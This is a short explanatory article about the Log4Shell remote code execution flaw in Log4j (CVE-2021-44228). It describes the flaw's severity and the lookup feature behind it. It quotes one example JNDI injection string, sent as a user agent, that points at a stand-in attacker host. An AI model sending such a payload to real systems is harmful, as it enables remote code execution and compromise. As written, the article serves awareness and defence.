Logfile Vulnerability Log4Shell for RCE
--
This article briefly describes a critical zero-day vulnerability called Log4Shell that existed in the widely used Java logging library Log4j used by millions of Java applications reachable from the Internet. The vulnerability can be exploited by even unskilled attackers and results in a remote code execution (RCE) when Log4j is used to write user controlled data into a log file.
The vulnerability is one of the worst ones in 2021 and was rated as very critical. It received a CVSS score of 10. CVSS is basically a metric to rate vulnerabilities and 10 is the maximum value that can be assigned to a vulnerability.The vulnerability was assigned the CVE number CVE-2021–44228.
Last update: 20th December, 2021
How Can an Attacker Exploit the Vulnerability?
Let’s assume you have a web application written in Java that logs the user agent of each request. You log this data because you use the data to create browser statistics for your web site in order to better optimize the web site.
If you use a vulnerable Log4j to log the user agents, an attacker could set the following string as the user agent of a request:
${jndi:ldap://attacker.wtf/a}When your application logs this string, Log4j by default tries to interpret the string. Here, Log4j performs a JNDI lookup and sends a request to the attacker’s controlled host attacker.wtf through the Java Naming and Directory Interface (JNDI). The response contains malicious code that is executed.
Why Is It possible?
Log4Shell is possible because Log4j has a feature called lookups. According to the documentation “Lookups provide a way to add values to the log4j configuration at arbitrary places”. These arbitrary places also include a log message itself. On the one hand lookups can be very simple. For instance, if the string ${java:version} is logged, it is replaced by the Java version (e.g. “Java version 11.0.11”). On the other hand, Lookups can be quite complex and even network communication can be involved to resolve a Lookup. The JNDI Lookups is such a Lookup.
